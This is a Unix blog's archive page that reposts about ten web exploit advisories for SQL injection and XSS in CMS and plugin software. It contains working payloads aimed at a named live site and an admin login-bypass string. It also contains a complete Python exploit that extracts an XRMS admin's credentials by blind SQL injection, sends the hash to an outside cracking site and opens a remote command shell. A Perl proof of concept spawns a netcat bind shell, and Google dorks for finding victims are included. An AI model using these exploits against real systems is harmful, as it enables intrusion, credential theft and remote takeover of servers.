MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

14Oct/140

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerables File: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3 
 
 
--- "SQLI using SQLMAP."--- 
 
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427
 
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
 
 
--- " XSS using HTML injection."---
 
    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
 
    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
 
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
 
# Note
 
The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
 
# Thank's

(88)

3Oct/140

AllMyVisitors 0.5.0 SQL Injection

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability
====================================================
Author : indoushka
Vondor : http://www.php-resource.net/
Dork:    Copyright (c) 2004 by voice of web
==========================
 
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. 
 
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/. 
Discovered by: Scripting (Blind_Sql_Injection.script). 
Attack details
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
 
Tests performed: 
if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.468 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.577 s
 
Insecure Cookie Handling :
 
admin.php
 
javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";
 
Auth Bypass :
 
admin.php
 
 Username : azerty' or '1=1--# Real admin name
 Password : demo1 ' or ' 1=1 or ADmin or  any thing

(91)

2Oct/140

WordPress Content Audit 1.6 Blind SQL Injection

Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)
 
Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes
 
Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and executed as part of a daily wp-cron job.
The fact that this is run only once a day makes it rather minor. An attacker would potentially need to poll /wp-cron.php repeatedly for 24 hours until they got the first result. As blind SQL injection attacks are usually done by comparing the first character to all possible characters – one at a time, until a match is found – it would take a very long time to exfiltrate useful data.
However, we don’t discount the possibility that someone cleverer than us could figure out a more practical attack.
 
Proof of concept
================
Steps an attacker may take:
 
Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to something which does sleep(5) if the first byte of the admin’s password hash is ‘a’ or sleep(10) otherwise
Press “Update Options”
Poll /wp-cron.php repeatedly until it takes longer than 5 seconds and record how long the request took
Repeat
 
Steps to take to verify that this issue exists:
 
Visit /wp-admin/options-general.php?page=content-audit
Check a “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to “‘” (a single apostrophe)
Press “Update Options”
Add “add_action(‘init’, ‘content_audit_mark_outdated’);” to content-audit-schedule.php somewhere and load any page
This error should occur: “WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘2013-08-12′”
If you replace “$oldposts = $wpdb->get_results” with “echo” on line 134 of content-audit-schedule.php you’ll notice that it’s inserting the ‘ unescaped – which means that you can insert whatever you like
 
 
Mitigations
================
You should update to version 1.62.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report with 14 days.
 
Timeline
================
 
2014-08-11 – Discovered
2014-08-21 – Requested author email address via a contact form
2014-08-27 – Reported to author via email
2014-09-22 – No response from author; reminder sent
2014-09-23 – Author responded
2014-09-24 – Fix released
2014-10-01 – Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

(126)

28Aug/140

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(a1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)

(637)

28Oct/130

WordPress WP Realty Blind SQL Injection

$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
 
 
Credits to: Greek Hacking Scene

(844)

29Sep/130

mod_accounting 0.5 Blind SQL Injection

   - Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
   - Affected Software: mod_accounting
   - Affected Version: 0.5. Other earlier versions may be affected.
   - Issue type: Blind SQL injection
   - Release Date: 20 Sep 2013
   - Discovered by: Eldar "Wireghoul" Marcussen
   - CVE Identifier: CVE-2013-5697
   - Issue status: Abandoned software, no patch available
 
Summary
 
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received values. The following is an example
configuration:
 
<VirtualHost _default_:*>
DocumentRoot "/var/www/"
Options Indexes
AccountingQueryFmt "INSERT INTO accounting VALUES( current_time, %r, %s,
'%u', '%h' );"
AccountingDatabase accounting
AccountingDatabaseDriver postgres
AccountingDBHost localhost 5432
AccountingLoginInfo acct acct
</VirtualHost>
 
As user supplied values are not sanitised before being used in the
placeholder values it is possible for an attacker to supply malicous values
to perform blind SQL injection.
 
 
Description
 
The SQL injection occurs due to a user supplied HTTP header being used in
the query without sanitisation. The module uses a simple string
concatination approach to modify the placeholders in the user defined query
before sending it to the database. This code can be located in
mod_accounting.c:
 
409: // build the query string from the template
410: while( ptr ) {
411:     char *next;
412:
413:     next = strchr( ptr, '%' );
414:
415:     if( next ) {
416:         char       tmp[ 2 ];
417:
418:         *next++ = '\0';
419:
420:         switch( *next++ ) {
421:
422:             case 'h':
423:                 query = ap_pstrcat( p, query, ptr, cfg->ServerName ?
cfg->ServerName : "-", NULL );
424:                 break;
425:
426:             case 's':
427:                 query = ap_pstrcat( p, query, ptr, sent, NULL );
428:                 break;
429:
430:             case 'r':
431:                 query = ap_pstrcat( p, query, ptr, recvd, NULL );
432:                 break;
433:
434:             case 'u':
435:                 query = ap_pstrcat( p, query, ptr, get_user( r ), NULL
);
436:                 break;
437:
438:             default:
439:                 tmp[0] = next[ -1 ];
440:                 tmp[1] = '\0';
441:
442:                 query = ap_pstrcat( p, query, ptr, tmp, NULL );
443:                 break;
444:         }
445:
446:         next[ -2 ] = '%';
447:
448:     } else
449:         query = ap_pstrcat( p, query, ptr, NULL );
450:
451:     ptr = next;
452: }
453:
454: ( *DBDrivers[ cfg->DBDriver ].Query )( cfg, server, p, query );
455:
456: cfg->Received = cfg->Sent = 0;
 
It is important to note that the database query takes place after the page
has been served, hence there is no easy way to determine if a particular
injection method was successful apart from using an out of band approach.
However, as the injection occurs in an insert statement it is likely that
the successful injection vector is one of about a handful of likely
candidates.
 
 
Impact
 
An attacker is only limited by the capabilities of the database
configuration and may be able to read, add, alter or delete data from your
database(s), read or write arbitrary files or even execute commands on the
server given a privileged database account.
 
 
Proof of Concept
 
root@bt:~/sploit-dev# cat mod_accounting-rce.pl
#!/usr/bin/perl
# PoC of blind SQL injection in the mod_accounting/0.5 Apache module
# Injection can occur via the Host header
# As the injection occurs in a user defined insert statement a bit of trial
and error is required
# Database operations occurs asyncronous to page response so timing attacks
wont work
# This one is completely blind
# DB can be mysql or postgres, this PoC only covers postgres
# PoC executes netcat to listen on port 4444 (requires dba privileges)
use IO::Socket::INET;
 
print "#----------------------------------------------#\n";
print "| mod_accounting/0.5 PoC exploit by \@Wireghoul |\n";
print "|          www.justanotherhacker.com           |\n";
print "#----------Command execution via SQLi----------#\n";
print "[*] Enumerating blind injection vectors:\n";
 
my @endings = ("'));", '"));', "));", "');", '");', ");", "';", '";',";");
# These should terminate most insert statements
#my @endings = ( "');" );
my $shell = 'nc -lnp 4444 -e /bin/sh';
my $cnt = 0;
my $content = "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
'/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
foreach $end (@endings) {
  $cnt++;
  my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to
connect to $ARGV[0]:$ARGV[1]: $!\n";
  my $str = "GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content --
\r\n\r\n"; # from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; --
\r\n\r\n";
  print "[-] Trying $end\n";
  print $sock $str;
  #print "Sent $end\n";
  close ($sock);
}
print "[*] Done, remote server should have executed $shell\n";
 
 
Execution of PoC:
--------------------------------------------------
root@bt:~/sploit-dev# nc 192.168.58.138 4444
(UNKNOWN) [192.168.58.138] 4444 (?) : Connection refused
root@bt:~/sploit-dev# perl mod_accounting-rce.pl 192.168.58.138 80
#----------------------------------------------#
| mod_accounting/0.5 PoC exploit by @Wireghoul |
|          www.justanotherhacker.com           |
#----------Command execution via SQLi----------#
[*] Enumerating blind injection vectors:
[-] Trying '));
[-] Trying "));
[-] Trying ));
[-] Trying ');
[-] Trying ");
[-] Trying );
[-] Trying ';
[-] Trying ";
[-] Trying ;
[*] Done, remote server should have executed nc -lnp 4444 -e /bin/sh
root@bt:~/sploit-dev# nc 192.168.58.138 4444
pwd
/var/lib/postgres/data/base/17142
id
uid=101(postgres) gid=104(postgres) groups=104(postgres)
hostname
sarge
^C
 
Solution
 
As the module is no longer supported, discontinue the use of this module.
 
 
Response Timeline
 
   - 03/09/2013 - Vendor notified
   - 03/09/2013 - Vendor acknowledge vulnerability
   - 04/09/2013 - Project download removed and website updated to reflect
   new status
   - 20/09/2013 - Advisory released

(604)

24Sep/130

Joomla JVideoClip Blind SQL Injection

================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog      : http://sixp4ck3r.blogspot.com/
Credits        : To my love!
Dork           : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind SQL Injection]
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[bSQLi]&Itemid=6
 
---------------------------------------------------------------------------
 
SixP4ck3r from Bolivia
___EOF____

(783)

29Mar/130

PsychoStats 3.2.2b Blind SQL Injection

Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link:http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
 
 
Use Havij to easy exploit
Enjoy
 
 
S.Th To a El Koyot
 
end

(497)

24Feb/130

Rix4Web Portal Remote Blind SQL Injection

################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
# Greetz To My Friendz

(568)

21Feb/130

Zenphoto 1.4.4.1 Blind SQL Injection

######################################################################################
#                                                                                    #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection                           #
#                                                                                    #
# Author        : HosseinNsn                                                         #
#                                                                                    #
# Home          : http://Emperor-Team.Org                                            #
#                                                                                    #
# Software Link : http://www.zenphoto.org                                            #
#                                                                                    #
# Security Risk : High                                                               #
#                                                                                    #
# Version       : 1.4.4.1                                                            #
#                                                                                    #
# Tested on     : Linux - Windows                                                    #
#                                                                                    #
# Google Dork   : "Powered by Zenphoto"                                              #
#                                                                                    #
######################################################################################
#                                                                                    #
#  Exploit :                                                                         #
#                                                                                    #
#  [Target]/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection]           #
#                                                                                    #
######################################################################################
#                                                                                    #
# SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N     #
#                                                                                    #
#           Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr   #
#                                                                                    #
#           Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir        #
#                                                                                    #
######################################################################################

(886)